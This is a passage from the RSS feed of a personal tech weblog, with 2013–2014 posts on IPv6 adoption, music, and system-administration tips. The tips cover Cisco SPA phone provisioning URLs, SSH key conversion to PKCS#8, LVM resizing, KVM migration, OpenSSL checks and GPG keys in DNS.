  5146.    <pubDate>Tue, 23 Sep 2014 18:32:00 +0200</pubDate>
  5147.    <category domain="">Networking</category>
  5148.    <description><![CDATA[<p>Since last week <a href="" title="Netflix">Netflix</a> is also available in Switzerland. The future has arrived one could say.<br>
  5149. Not only gives this easy access to TV shows and movies but also is this access provided via IPv6.</p>
  5151. <p>As you can see on the graph below, this brings IPv6 out of slumber and into primetime :-)<br>
  5152. Swiss providers are probably seeing quite an increase in IPv6 traffic this month.</p>
  5154. <p><img alt="Netflix IPv6 traffic" src="" width="500" height="170"></p>
  5155. ]]></description>
  5156.    <content:encoded><![CDATA[<p>Since last week <a href="" title="Netflix">Netflix</a> is also available in Switzerland. The future has arrived one could say.<br>
  5157. Not only gives this easy access to TV shows and movies but also is this access provided via IPv6.</p>
  5159. <p>As you can see on the graph below, this brings IPv6 out of slumber and into primetime :-)<br>
  5160. Swiss providers are probably seeing quite an increase in IPv6 traffic this month.</p>
  5162. <p><img alt="Netflix IPv6 traffic" src="" width="500" height="170"></p>
  5163. ]]></content:encoded>
  5164.  </item>
  5166.  <item>
  5167.    <title>Octave Minds</title>
  5168.    <link></link>
  5169.    <guid isPermaLink="true"></guid>
  5170.    <dc:creator>Andreas Jaggi</dc:creator>
  5171.    <creativeCommons:license></creativeCommons:license>
  5172.    <pubDate>Thu, 18 Sep 2014 11:42:00 +0200</pubDate>
  5173.    <category domain="">Music</category>
  5174.    <description><![CDATA[<p><a href="" title="Octave Minds - Anthem - YouTube">Octave Minds - Anthem</a></p>
  5175. <p><a href="" title="OCTAVE MINDS">Octave Minds</a> (<a href="" title="">via</a>)</p>
  5176. ]]></description>
  5177.    <content:encoded><![CDATA[<p><a href="" title="Octave Minds - Anthem - YouTube">Octave Minds - Anthem</a></p>
  5178. <p><a href="" title="OCTAVE MINDS">Octave Minds</a> (<a href="" title="">via</a>)</p>
  5179. ]]></content:encoded>
  5180.  </item>
  5182.  <item>
  5183.    <title>Fancy blog statistics</title>
  5184.    <link></link>
  5185.    <guid isPermaLink="true"></guid>
  5186.    <dc:creator>Andreas Jaggi</dc:creator>
  5187.    <creativeCommons:license></creativeCommons:license>
  5188.    <pubDate>Fri, 12 Sep 2014 14:48:00 +0200</pubDate>
  5189.    <category domain="">Webdesign</category>
  5190.    <description><![CDATA[<p><a href="" title="x-log: About">The about page</a> now features some fancy blog statistics, check it out :-)</p>
  5191. <p>The statistics are created with the help of <a href="" title="Cal-Heatmap">Cal-Heatmap</a> which allows to easily create calendar heatmaps similar to the activity heatmap of GitHub.</p>
  5192. <p><b>Update:</b> couldn't stop playing around and thus added another chart, this time with the help of <a href="" title="C3.js | D3-based reusable chart library">C3.js</a> (a <a href="" title="D3.js - Data-Driven Documents">D3.js</a> based reusable chart library).</p>
  5193. ]]></description>
  5194.    <content:encoded><![CDATA[<p><a href="" title="x-log: About">The about page</a> now features some fancy blog statistics, check it out :-)</p>
  5195. <p>The statistics are created with the help of <a href="" title="Cal-Heatmap">Cal-Heatmap</a> which allows to easily create calendar heatmaps similar to the activity heatmap of GitHub.</p>
  5196. <p><b>Update:</b> couldn't stop playing around and thus added another chart, this time with the help of <a href="" title="C3.js | D3-based reusable chart library">C3.js</a> (a <a href="" title="D3.js - Data-Driven Documents">D3.js</a> based reusable chart library).</p>
  5197. ]]></content:encoded>
  5198.  </item>
  5200.  <item>
  5201.    <title>Sipura/Linksys/Cisco SPA901 SPA3102 reboot phone</title>
  5202.    <link></link>
  5203.    <guid isPermaLink="true"></guid>
  5204.    <dc:creator>Andreas Jaggi</dc:creator>
  5205.    <creativeCommons:license></creativeCommons:license>
  5206.    <pubDate>Thu, 04 Sep 2014 10:42:00 +0200</pubDate>
  5207.    <category domain="">Networking</category>
  5208.    <description><![CDATA[<p>SPA901 and SPA3102 phones can be rebooted by calling the following URL (which triggers an automatic config resync after the reboot):</p>
  5209. <pre>http://&lt;PHONEIP&gt;/admin/reboot</pre>
  5210. ]]></description>
  5211.    <content:encoded><![CDATA[<p>SPA901 and SPA3102 phones can be rebooted by calling the following URL (which triggers an automatic config resync after the reboot):</p>
  5212. <pre>http://&lt;PHONEIP&gt;/admin/reboot</pre>
  5213. ]]></content:encoded>
  5214.  </item>
  5216.  <item>
  5217.    <title>Sipura/Linksys/Cisco SPA901 SPA3102 download current configuration</title>
  5218.    <link></link>
  5219.    <guid isPermaLink="true"></guid>
  5220.    <dc:creator>Andreas Jaggi</dc:creator>
  5221.    <creativeCommons:license></creativeCommons:license>
  5222.    <pubDate>Sat, 30 Aug 2014 22:16:00 +0200</pubDate>
  5223.    <category domain="">Networking</category>
  5224.    <description><![CDATA[<p>The current configuration of an SPA901 phone can be downloaded like this:</p>
  5225. <pre>http://&lt;PHONEIP&gt;/admin/spacfg.xml</pre>
  5226. <p>For SPA3102 devices the URL is different:</p>
  5227. <pre>http://&lt;PHONEIP&gt;/admin/config.xml</pre>
  5228. ]]></description>
  5229.    <content:encoded><![CDATA[<p>The current configuration of an SPA901 phone can be downloaded like this:</p>
  5230. <pre>http://&lt;PHONEIP&gt;/admin/spacfg.xml</pre>
  5231. <p>For SPA3102 devices the URL is different:</p>
  5232. <pre>http://&lt;PHONEIP&gt;/admin/config.xml</pre>
  5233. ]]></content:encoded>
  5234.  </item>
  5236.  <item>
  5237.    <title>Native IPv6</title>
  5238.    <link></link>
  5239.    <guid isPermaLink="true"></guid>
  5240.    <dc:creator>Andreas Jaggi</dc:creator>
  5241.    <creativeCommons:license></creativeCommons:license>
  5242.    <pubDate>Fri, 25 Jul 2014 08:08:00 +0200</pubDate>
  5243.    <category domain="">Networking</category>
  5244.    <description><![CDATA[<p>Yesterday I switched our DSL Link to <a href="" title=""></a>. Now we not only have a higher bandwidth (thanks to VDSL) but also native IPv6 connectivity!<br>Especially nice is that it all works out of the box. After plugging in the pre-configured FritzBox, it automatically gets an IPv6 prefix via Prefix Delegation and announces it to the clients in the LAN.</p>
  5245. <pre>08:05 [ aj @ actuarius : ~ ] % mtr -rc5
  5246. Start: Fri Jul 25 08:06:42 2014
  5247. HOST:         Loss%   Snt   Last   Avg  Best  Wrst StDev
  5248.  1.|--                  0.0%     5    0.8   0.8   0.7   0.8   0.0
  5249.  2.|-- 2a01:2a8::121              0.0%     5    8.6   8.7   8.5   9.2   0.0
  5250.  3.|-- 2a01:2a8:0:5a::1           0.0%     5    8.4   8.2   8.0   8.4   0.0
  5251.  4.|-- 2a01:2a8:1:7::4            0.0%     5    8.1   8.6   8.1   9.6   0.0
  5252.  5.|-- 2a00:db0:9:a06::5          0.0%     5    8.8   8.6   8.3   8.8   0.0
  5253.  6.|--                0.0%     5    8.9   8.7   8.6   8.9   0.0</pre>
  5254. ]]></description>
  5255.    <content:encoded><![CDATA[<p>Yesterday I switched our DSL Link to <a href="" title=""></a>. Now we not only have a higher bandwidth (thanks to VDSL) but also native IPv6 connectivity!<br>Especially nice is that it all works out of the box. After plugging in the pre-configured FritzBox, it automatically gets an IPv6 prefix via Prefix Delegation and announces it to the clients in the LAN.</p>
  5256. <pre>08:05 [ aj @ actuarius : ~ ] % mtr -rc5
  5257. Start: Fri Jul 25 08:06:42 2014
  5258. HOST:         Loss%   Snt   Last   Avg  Best  Wrst StDev
  5259.  1.|--                  0.0%     5    0.8   0.8   0.7   0.8   0.0
  5260.  2.|-- 2a01:2a8::121              0.0%     5    8.6   8.7   8.5   9.2   0.0
  5261.  3.|-- 2a01:2a8:0:5a::1           0.0%     5    8.4   8.2   8.0   8.4   0.0
  5262.  4.|-- 2a01:2a8:1:7::4            0.0%     5    8.1   8.6   8.1   9.6   0.0
  5263.  5.|-- 2a00:db0:9:a06::5          0.0%     5    8.8   8.6   8.3   8.8   0.0
  5264.  6.|--                0.0%     5    8.9   8.7   8.6   8.9   0.0</pre>
  5265. ]]></content:encoded>
  5266.  </item>
  5268.  <item>
  5269.    <title>12 Years</title>
  5270.    <link></link>
  5271.    <guid isPermaLink="true"></guid>
  5272.    <dc:creator>Andreas Jaggi</dc:creator>
  5273.    <creativeCommons:license></creativeCommons:license>
  5274.    <pubDate>Tue, 03 Jun 2014 08:50:00 +0200</pubDate>
  5275.    <category domain="">Misc</category>
  5276.    <description><![CDATA[<p>12 years ago I started this weblog with a link to <a href="" title=""></a>.<br>
  5277. It's now 555 posts later and I think what is most unexpected (besides that this weblog is still existing 12 years later), is that this first link from my first post is still valid (and still pointing to some Flash-only website...).</p>
  5278. <p>So far this weblog has survived 2 different domains, 3 different servers, multiple versions of a self-made blogging-engine, about 6 different layout designs, a database-crash, recovery via and a migration to Jekyll.</p>
  5279. <p>No guarantee that it will last another 12 years, but for the meantime: Cheers, and enjoy the ride!</p>
  5280. <p><img src="" width="333" height="398" alt="12 years, Cheers!"></p>
  5281. ]]></description>
  5282.    <content:encoded><![CDATA[<p>12 years ago I started this weblog with a link to <a href="" title=""></a>.<br>
  5283. It's now 555 posts later and I think what is most unexpected (besides that this weblog is still existing 12 years later), is that this first link from my first post is still valid (and still pointing to some Flash-only website...).</p>
  5284. <p>So far this weblog has survived 2 different domains, 3 different servers, multiple versions of a self-made blogging-engine, about 6 different layout designs, a database-crash, recovery via and a migration to Jekyll.</p>
  5285. <p>No guarantee that it will last another 12 years, but for the meantime: Cheers, and enjoy the ride!</p>
  5286. <p><img src="" width="333" height="398" alt="12 years, Cheers!"></p>
  5287. ]]></content:encoded>
  5288.  </item>
  5290.  <item>
  5291.    <title>It's alive!</title>
  5292.    <link></link>
  5293.    <guid isPermaLink="true"></guid>
  5294.    <dc:creator>Andreas Jaggi</dc:creator>
  5295.    <creativeCommons:license></creativeCommons:license>
  5296.    <pubDate>Wed, 28 May 2014 23:19:00 +0200</pubDate>
  5297.    <category domain="">Networking</category>
  5298.    <description><![CDATA[<p><img src="" width="520" height="390" alt="Wandtelefon Modell 50 with SIP ATA"></p>
  5299. <p>Wandtelefon Modell 50 from January 1970 now talks SIP (and it only took two converters, a bit of cable-fiddling and some luck :-)</p>
  5300. ]]></description>
  5301.    <content:encoded><![CDATA[<p><img src="" width="520" height="390" alt="Wandtelefon Modell 50 with SIP ATA"></p>
  5302. <p>Wandtelefon Modell 50 from January 1970 now talks SIP (and it only took two converters, a bit of cable-fiddling and some luck :-)</p>
  5303. ]]></content:encoded>
  5304.  </item>
  5306.  <item>
  5307.    <title>Stop BÜPF!</title>
  5308.    <link></link>
  5309.    <guid isPermaLink="true"></guid>
  5310.    <dc:creator>Andreas Jaggi</dc:creator>
  5311.    <creativeCommons:license></creativeCommons:license>
  5312.    <pubDate>Thu, 22 May 2014 19:55:00 +0200</pubDate>
  5313.    <category domain="">Networking</category>
  5314.    <description><![CDATA[<p><a href="" title="Stop BÜPF! ("><img src="" width="300" height="168" alt="Stop BÜPF!"></a></p>
  5315. ]]></description>
  5316.    <content:encoded><![CDATA[<p><a href="" title="Stop BÜPF! ("><img src="" width="300" height="168" alt="Stop BÜPF!"></a></p>
  5317. ]]></content:encoded>
  5318.  </item>
  5320.  <item>
  5321.    <title>Load PKCS#8 SSH key files in Mac OS X 10.9</title>
  5322.    <link></link>
  5323.    <guid isPermaLink="true"></guid>
  5324.    <dc:creator>Andreas Jaggi</dc:creator>
  5325.    <creativeCommons:license></creativeCommons:license>
  5326.    <pubDate>Fri, 18 Apr 2014 14:36:00 +0200</pubDate>
  5327.    <category domain="">Networking</category>
  5328.    <description><![CDATA[<p>There is currently a bug in Mac OS X 10.9 which causes that ssh-add is no longer able to read SSH key files in PKCS#8 format.</p>
  5329. <p>Fortunately ssh-add still reads PKCS#8 keys when provided through STDIN and openssl is able to decrypt PKCS#8 keys.</p>
  5330. <p>Thus the following workaround so that PKCS#8 SSH keys can be loaded again:</p>
  5331. <pre>
  5332. openssl pkcs8 -in ~/.ssh/id_rsa | ssh-add -
  5333. </pre>
  5334. ]]></description>
  5335.    <content:encoded><![CDATA[<p>There is currently a bug in Mac OS X 10.9 which causes that ssh-add is no longer able to read SSH key files in PKCS#8 format.</p>
  5336. <p>Fortunately ssh-add still reads PKCS#8 keys when provided through STDIN and openssl is able to decrypt PKCS#8 keys.</p>
  5337. <p>Thus the following workaround so that PKCS#8 SSH keys can be loaded again:</p>
  5338. <pre>
  5339. openssl pkcs8 -in ~/.ssh/id_rsa | ssh-add -
  5340. </pre>
  5341. ]]></content:encoded>
  5342.  </item>
  5344.  <item>
  5345.    <title>Facebook: The Road To IPv6</title>
  5346.    <link></link>
  5347.    <guid isPermaLink="true"></guid>
  5348.    <dc:creator>Andreas Jaggi</dc:creator>
  5349.    <creativeCommons:license></creativeCommons:license>
  5350.    <pubDate>Sun, 23 Mar 2014 15:09:00 +0100</pubDate>
  5351.    <category domain="">Networking</category>
  5352.    <description><![CDATA[<p>Great presentation by <a href="" title="Paul Saab | Facebook">Paul Saab</a> about the IPv6 introduction at Facebook: <a href="" title="Paul Saab - Facebook: The Road To IPv6">The Road To IPv6</a></p>
  5353. <p>(<a href="" title="Hacker News">via</a>)</p>
  5354. ]]></description>
  5355.    <content:encoded><![CDATA[<p>Great presentation by <a href="" title="Paul Saab | Facebook">Paul Saab</a> about the IPv6 introduction at Facebook: <a href="" title="Paul Saab - Facebook: The Road To IPv6">The Road To IPv6</a></p>
  5356. <p>(<a href="" title="Hacker News">via</a>)</p>
  5357. ]]></content:encoded>
  5358.  </item>
  5360.  <item>
  5361.    <title>Moving a KVM guest to another machine</title>
  5362.    <link></link>
  5363.    <guid isPermaLink="true"></guid>
  5364.    <dc:creator>Andreas Jaggi</dc:creator>
  5365.    <creativeCommons:license></creativeCommons:license>
  5366.    <pubDate>Thu, 13 Feb 2014 20:02:00 +0100</pubDate>
  5367.    <category domain="">Linux</category>
  5368.    <description><![CDATA[<ol>
  5369. <li>Properly shutdown the guest: <pre>guest# poweroff</pre></li>
  5370. <li>Create an LVM volume of the same size on the new machine: <pre>newmachine# lvcreate -L 120G -n myguest myvolgroup</pre></li>
  5371. <li>Copy the disk from the old machine over to the new one: <pre>oldmachine# dd if=/dev/vg_foo/lv_bar | ssh newmachine dd of=/dev/volgroup/myguest</pre></li>
  5372. <li>Wait for the transfer to complete (on a 100Mbit/s connection it took about 3.5 hours to transfer the 120GB).</li>
  5373. <li>Copy /etc/libvirt/qemu/myguest.xml from the old machine over to the new machine and adapt the LVM path for the disk.</li>
  5374. <li>Reload the libvirt configuration: <pre>newmachine# /etc/init.d/libvirt-bin reload</pre></li>
  5375. <li>Start up the guest on the new machine: <pre>newmachine# virsh start myguest</pre></li>
  5376. </ol>
  5377. ]]></description>
  5378.    <content:encoded><![CDATA[<ol>
  5379. <li>Properly shutdown the guest: <pre>guest# poweroff</pre></li>
  5380. <li>Create an LVM volume of the same size on the new machine: <pre>newmachine# lvcreate -L 120G -n myguest myvolgroup</pre></li>
  5381. <li>Copy the disk from the old machine over to the new one: <pre>oldmachine# dd if=/dev/vg_foo/lv_bar | ssh newmachine dd of=/dev/volgroup/myguest</pre></li>
  5382. <li>Wait for the transfer to complete (on a 100Mbit/s connection it took about 3.5 hours to transfer the 120GB).</li>
  5383. <li>Copy /etc/libvirt/qemu/myguest.xml from the old machine over to the new machine and adapt the LVM path for the disk.</li>
  5384. <li>Reload the libvirt configuration: <pre>newmachine# /etc/init.d/libvirt-bin reload</pre></li>
  5385. <li>Start up the guest on the new machine: <pre>newmachine# virsh start myguest</pre></li>
  5386. </ol>
  5387. ]]></content:encoded>
  5388.  </item>
  5390.  <item>
  5391.    <title>Shrinking a LVM root partition</title>
  5392.    <link></link>
  5393.    <guid isPermaLink="true"></guid>
  5394.    <dc:creator>Andreas Jaggi</dc:creator>
  5395.    <creativeCommons:license></creativeCommons:license>
  5396.    <pubDate>Thu, 13 Feb 2014 19:02:00 +0100</pubDate>
  5397.    <category domain="">Linux</category>
  5398.    <description><![CDATA[<ol>
  5399. <li>Boot from a helper system and get a root shell (I used the rescue mode of the Debian installer)</li>
  5400. <li>Check the filesystem of the partition to resize: <pre>e2fsck -f /dev/vg_foo/lv_bar</pre></li>
  5401. <li>Resize the filesystem (make it a bit smaller than the target size, to have a safety margin when resizing the logical volume): <pre>resize2fs /dev/vg_foo/lv_bar 180G</pre></li>
  5402. <li>Reduce size of the logical volume: <pre>lvreduce -L 190G /dev/vg_foo/lv_bar</pre></li>
  5403. <li>Grow the filesystem to the new size of the logical volume: <pre>resize2fs /dev/vg_foo/lv_bar</pre></li>
  5404. <li>For good measure run another filesystem check: <pre>e2fsck -f /dev/vg_foo/lv_bar</pre></li>
  5405. </ol>
  5406. ]]></description>
  5407.    <content:encoded><![CDATA[<ol>
  5408. <li>Boot from a helper system and get a root shell (I used the rescue mode of the Debian installer)</li>
  5409. <li>Check the filesystem of the partition to resize: <pre>e2fsck -f /dev/vg_foo/lv_bar</pre></li>
  5410. <li>Resize the filesystem (make it a bit smaller than the target size, to have a safety margin when resizing the logical volume): <pre>resize2fs /dev/vg_foo/lv_bar 180G</pre></li>
  5411. <li>Reduce size of the logical volume: <pre>lvreduce -L 190G /dev/vg_foo/lv_bar</pre></li>
  5412. <li>Grow the filesystem to the new size of the logical volume: <pre>resize2fs /dev/vg_foo/lv_bar</pre></li>
  5413. <li>For good measure run another filesystem check: <pre>e2fsck -f /dev/vg_foo/lv_bar</pre></li>
  5414. </ol>
  5415. ]]></content:encoded>
  5416.  </item>
  5418.  <item>
  5419.    <title>Verify that an SSL certificate matches the private key</title>
  5420.    <link></link>
  5421.    <guid isPermaLink="true"></guid>
  5422.    <dc:creator>Andreas Jaggi</dc:creator>
  5423.    <creativeCommons:license></creativeCommons:license>
  5424.    <pubDate>Sun, 19 Jan 2014 13:32:00 +0100</pubDate>
  5425.    <category domain="">Networking</category>
  5426.    <description><![CDATA[<p>When renewing certificates it is a good idea to verify that the newly installed SSL certificate matches the newly installed private key (eg. to make sure no mixup between the new and old files occurred).<br>This can be done by comparing the modulus of the two files:</p>
  5427. <pre>openssl x509 -in &lt;certificatefile&gt; -noout -modulus|sha1sum
  5428. openssl rsa -in &lt;privatekeyfile&gt; -noout -modulus|sha1sum</pre>
  5429. ]]></description>
  5430.    <content:encoded><![CDATA[<p>When renewing certificates it is a good idea to verify that the newly installed SSL certificate matches the newly installed private key (eg. to make sure no mixup between the new and old files occurred).<br>This can be done by comparing the modulus of the two files:</p>
  5431. <pre>openssl x509 -in &lt;certificatefile&gt; -noout -modulus|sha1sum
  5432. openssl rsa -in &lt;privatekeyfile&gt; -noout -modulus|sha1sum</pre>
  5433. ]]></content:encoded>
  5434.  </item>
  5436.  <item>
  5437.    <title>Sipura/Linksys/Cisco SPA901 Provisioning and Upgrade</title>
  5438.    <link></link>
  5439.    <guid isPermaLink="true"></guid>
  5440.    <dc:creator>Andreas Jaggi</dc:creator>
  5441.    <creativeCommons:license></creativeCommons:license>
  5442.    <pubDate>Sun, 12 Jan 2014 21:02:00 +0100</pubDate>
  5443.    <category domain="">Networking</category>
  5444.    <description><![CDATA[<p>Loading the configuration from http://config.server/configfile.xml (provisioning has to be enabled on the phone):</p>
  5445. <pre>http://&lt;PHONEIP&gt;/admin/resync?http://config.server/configfile.xml</pre>
  5446. <p>Upgrading the firmware with the image from http://upgrade.server/firmware.bin:</p>
  5447. <pre>http://&lt;PHONEIP&gt;/upgrade?http://upgrade.server/firmware.bin</pre>
  5448. ]]></description>
  5449.    <content:encoded><![CDATA[<p>Loading the configuration from http://config.server/configfile.xml (provisioning has to be enabled on the phone):</p>
  5450. <pre>http://&lt;PHONEIP&gt;/admin/resync?http://config.server/configfile.xml</pre>
  5451. <p>Upgrading the firmware with the image from http://upgrade.server/firmware.bin:</p>
  5452. <pre>http://&lt;PHONEIP&gt;/upgrade?http://upgrade.server/firmware.bin</pre>
  5453. ]]></content:encoded>
  5454.  </item>
  5456.  <item>
  5457.    <title>Publish GPG Keys in DNS</title>
  5458.    <link></link>
  5459.    <guid isPermaLink="true"></guid>
  5460.    <dc:creator>Andreas Jaggi</dc:creator>
  5461.    <creativeCommons:license></creativeCommons:license>
  5462.    <pubDate>Wed, 01 Jan 2014 13:52:00 +0100</pubDate>
  5463.    <category domain="">Networking</category>
  5464.    <description><![CDATA[<p>Create the PKA DNS record:</p>
  5465. <pre># <b>localpart=andreas url=</b>
  5466. # <b>LANG=C gpg --fingerprint ${localpart}@${domain}|awk -v local=$localpart -v domain=$domain -v url=$url \
  5467. '/fingerprint/{printf("%s._pka.%s. TXT \"v=pka1;fpr=%s;uri=%s\"\n",local,domain,$4$5$6$7$8$9$10$11$12$13,url)}'</b>
  5468. TXT "v=pka1;fpr=1073501542F38352FC85788207A32EAB1C6AC951;uri="</pre>
  5469. <p>Test DNS resolution:</p>
  5470. <pre># <b>dig +short -t txt</b>
  5471. "v=pka1\;fpr=1388580990F38352FC85788207A32EAB1C6AC951\;uri="</pre>
  5472. <p>Test with GPG:</p>
  5473. <pre># <b>gpg --auto-key-locate pka -ea -r ${localpart}@${domain}</b></pre>
  5474. <p>
  5475. Detailed explanation of the different DNS publication mechanisms for PGP Keys:<br><a href="" title="Publishing PGP Keys in DNS">Publishing PGP Keys in DNS</a></p>
  5476. <p>(<a href="" title="">via</a>)</p>
  5477. ]]></description>
  5478.    <content:encoded><![CDATA[<p>Create the PKA DNS record:</p>
  5479. <pre># <b>localpart=andreas url=</b>
  5480. # <b>LANG=C gpg --fingerprint ${localpart}@${domain}|awk -v local=$localpart -v domain=$domain -v url=$url \
  5481. '/fingerprint/{printf("%s._pka.%s. TXT \"v=pka1;fpr=%s;uri=%s\"\n",local,domain,$4$5$6$7$8$9$10$11$12$13,url)}'</b>
  5482. TXT "v=pka1;fpr=1073501542F38352FC85788207A32EAB1C6AC951;uri="</pre>
  5483. <p>Test DNS resolution:</p>
  5484. <pre># <b>dig +short -t txt</b>
  5485. "v=pka1\;fpr=1388580990F38352FC85788207A32EAB1C6AC951\;uri="</pre>
  5486. <p>Test with GPG:</p>
  5487. <pre># <b>gpg --auto-key-locate pka -ea -r ${localpart}@${domain}</b></pre>
  5488. <p>
  5489. Detailed explanation of the different DNS publication mechanisms for PGP Keys:<br><a href="" title="Publishing PGP Keys in DNS">Publishing PGP Keys in DNS</a></p>
  5490. <p>(<a href="" title="">via</a>)</p>
  5491. ]]></content:encoded>
  5492.  </item>
  5494.  <item>
  5495.    <title>Improve the security of your SSH private key files with PKCS#8</title>
  5496.    <link></link>
  5497.    <guid isPermaLink="true"></guid>
  5498.    <dc:creator>Andreas Jaggi</dc:creator>
  5499.    <creativeCommons:license></creativeCommons:license>
  5500.    <pubDate>Sun, 29 Dec 2013 15:23:00 +0100</pubDate>
  5501.    <category domain="">Networking</category>
  5502.    <description><![CDATA[<p>Instead of the easily brute-forceable one-pass MD5/AES128 password protection format used by SSH per default, you should use the <a href="" title="RFC 5208 - PKCS#8: Private-Key Information Syntax Specification Version 1.2">PKCS#8</a> format to store your private key files. PKCS#8 allows to choose proper key-derivation functions and encryption schemes (for example <a href="" title="Password-Based Key Derivation Function 2">PBKDF2</a> and <a href="" title="Password-Based Encryption Scheme 2">PBES2</a>).<br>
  5503. The following commands convert an existing password protected SSH private key file to PKCS#8 format (using PBKDF2, PBES2 and AES-256):</p>
  5504. <pre>
  5505. mv ~/.ssh/id_rsa{,.old}
  5506. openssl pkcs8 -topk8 -v2 aes256 -in ~/.ssh/id_rsa.old -out ~/.ssh/id_rsa
  5507. chmod 600 ~/.ssh/id_rsa
  5508. rm ~/.ssh/id_rsa.old
  5509. </pre>
  5510. <p>(via <a href="" title="Improving the security of your SSH private key files - Martin Kleppmann's blog">Martin Kleppmann</a>)</p>
  5511. ]]></description>
  5512.    <content:encoded><![CDATA[<p>Instead of the easily brute-forceable one-pass MD5/AES128 password protection format used by SSH per default, you should use the <a href="" title="RFC 5208 - PKCS#8: Private-Key Information Syntax Specification Version 1.2">PKCS#8</a> format to store your private key files. PKCS#8 allows to choose proper key-derivation functions and encryption schemes (for example <a href="" title="Password-Based Key Derivation Function 2">PBKDF2</a> and <a href="" title="Password-Based Encryption Scheme 2">PBES2</a>).<br>
  5513. The following commands convert an existing password protected SSH private key file to PKCS#8 format (using PBKDF2, PBES2 and AES-256):</p>
  5514. <pre>
  5515. mv ~/.ssh/id_rsa{,.old}
  5516. openssl pkcs8 -topk8 -v2 aes256 -in ~/.ssh/id_rsa.old -out ~/.ssh/id_rsa
  5517. chmod 600 ~/.ssh/id_rsa
  5518. rm ~/.ssh/id_rsa.old
  5519. </pre>
  5520. <p>(via <a href="" title="Improving the security of your SSH private key files - Martin Kleppmann's blog">Martin Kleppmann</a>)</p>
  5521. ]]></content:encoded>
  5522.  </item>
  5524.  <item>
  5525.    <title>Make grep 50x faster</title>
  5526.    <link></link>
  5527.    <guid isPermaLink="true"></guid>
  5528.    <dc:creator>Andreas Jaggi</dc:creator>
  5529.    <creativeCommons:license></creativeCommons:license>
  5530.    <pubDate>Sun, 15 Dec 2013 14:33:00 +0100</pubDate>
  5531.    <category domain="">Linux</category>
  5532.    <description><![CDATA[<p>
  5533. Found this neat trick in Brendan Gregg's <a href="" title="Blazing Performance with Flame Graphs">Blazing Performance with Flame Graphs</a> talk.
  5534. </p>
  5536. <blockquote><p>Switching to LANG=C improved performance by <strong>2000x</strong></p></blockquote>
  5538. <p>
  5539. In a quick test I directly got a performance gain of factor <strong>50.22</strong>.<br>
  5540. This is quite an achievement for only changing one environment variable.
  5541. </p>
  5543. <pre>
  5544. real:~# du -sh /var/log/querylog
  5545. 148M /var/log/querylog
  5546. real:~# time grep -i e /var/log/querylog &gt; /dev/null
  5548. real 0m12.807s
  5549. user 0m12.437s
  5550. sys 0m0.068s
  5551. real:~# time LANG=C grep -i e /var/log/querylog &gt; /dev/null
  5553. real 0m0.255s
  5554. user 0m0.196s
  5555. sys 0m0.052s
  5556. </pre>
  5558. <p>
  5559. I suspect that the performance gain may vary quite a lot depending on the search pattern.
  5560. Also, please note that this trick only works when you know that the involved files and search patterns are ASCII only.
  5561. </p>
  5562. <p>(via <a href="" title="LISA13 Conference Review / Overview Thing | Standalone Sysadmin">Standalone Sysadmin</a>)</p>
  5563. ]]></description>
  5564.    <content:encoded><![CDATA[<p>
  5565. Found this neat trick in Brendan Gregg's <a href="" title="Blazing Performance with Flame Graphs">Blazing Performance with Flame Graphs</a> talk.
  5566. </p>
  5568. <blockquote><p>Switching to LANG=C improved performance by <strong>2000x</strong></p></blockquote>
  5570. <p>
  5571. In a quick test I directly got a performance gain of factor <strong>50.22</strong>.<br>
  5572. This is quite an achievement for only changing one environment variable.
  5573. </p>
  5575. <pre>
  5576. real:~# du -sh /var/log/querylog
  5577. 148M /var/log/querylog
  5578. real:~# time grep -i e /var/log/querylog &gt; /dev/null
  5580. real 0m12.807s
  5581. user 0m12.437s
  5582. sys 0m0.068s
  5583. real:~# time LANG=C grep -i e /var/log/querylog &gt; /dev/null
  5585. real 0m0.255s
  5586. user 0m0.196s
  5587. sys 0m0.052s
  5588. </pre>
  5590. <p>
  5591. I suspect that the performance gain may vary quite a lot depending on the search pattern.
  5592. Also, please note that this trick only works when you know that the involved files and search patterns are ASCII only.
  5593. </p>
  5594. <p>(via <a href="" title="LISA13 Conference Review / Overview Thing | Standalone Sysadmin">Standalone Sysadmin</a>)</p>
  5595. ]]></content:encoded>
  5596.  </item>
  5598.  <item>
  5599.    <title>WOODKID</title>
  5600.    <link></link>
  5601.    <guid isPermaLink="true"></guid>
  5602.    <dc:creator>Andreas Jaggi</dc:creator>
  5603.    <creativeCommons:license></creativeCommons:license>
  5604.    <pubDate>Sun, 01 Dec 2013 12:36:00 +0100</pubDate>
  5605.    <category domain="">Music</category>
  5606.    <description><![CDATA[<p>Another nice discovery from <a href="" title="Metropop Festival Lausanne">Metropop</a>: <a href="" title="WOODKID">WOODKID</a></p>
  5607. <p><a href="" title="Woodkid - Run Boy Run - YouTube">Woodkid - Run Boy Run</a></p>
  5609. ]]></description>
  5610.    <content:encoded><![CDATA[<p>Another nice discovery from <a href="" title="Metropop Festival Lausanne">Metropop</a>: <a href="" title="WOODKID">WOODKID</a></p>
  5611. <p><a href="" title="Woodkid - Run Boy Run - YouTube">Woodkid - Run Boy Run</a></p>
  5613. ]]></content:encoded>
  5614.  </item>
  5616.  <item>
  5617.    <title>Major Look - Too Late</title>
  5618.    <link></link>
  5619.    <guid isPermaLink="true"></guid>
  5620.    <dc:creator>Andreas Jaggi</dc:creator>
  5621.    <creativeCommons:license></creativeCommons:license>
  5622.    <pubDate>Wed, 21 Aug 2013 06:15:00 +0200</pubDate>
  5623.    <category domain="">Music</category>
  5624.    <description><![CDATA[<p><a href="" title="Major Look - Too Late - YouTube">Major Look - Too Late</a></p>
  5625. ]]></description>
  5626.    <content:encoded><![CDATA[<p><a href="" title="Major Look - Too Late - YouTube">Major Look - Too Late</a></p>
  5627. ]]></content:encoded>
  5628.  </item>
  5630.  <item>
  5631.    <title>Mandatory requirement for all non IPv6 capable products</title>
  5632.    <link></link>
  5633.    <guid isPermaLink="true"></guid>
  5634.    <dc:creator>Andreas Jaggi</dc:creator>
  5635.    <creativeCommons:license></creativeCommons:license>
  5636.    <pubDate>Fri, 05 Jul 2013 09:37:00 +0200</pubDate>
  5637.    <category domain="">Networking</category>
  5638.    <description><![CDATA[<p><img src="" alt="IPv4 only"></p>
  5639. <p>(via <a href="" title="Jens' BLOG ("></a>)</p>
  5640. ]]></description>
  5641.    <content:encoded><![CDATA[<p><img src="" alt="IPv4 only"></p>
  5642. <p>(via <a href="" title="Jens' BLOG ("></a>)</p>
  5643. ]]></content:encoded>
  5644.  </item>
  5646.  <item>
  5647.    <title>Run your own DynDNS server</title>
  5648.    <link></link>
  5649.    <guid isPermaLink="true"></guid>
  5650.    <dc:creator>Andreas Jaggi</dc:creator>
  5651.    <creativeCommons:license></creativeCommons:license>
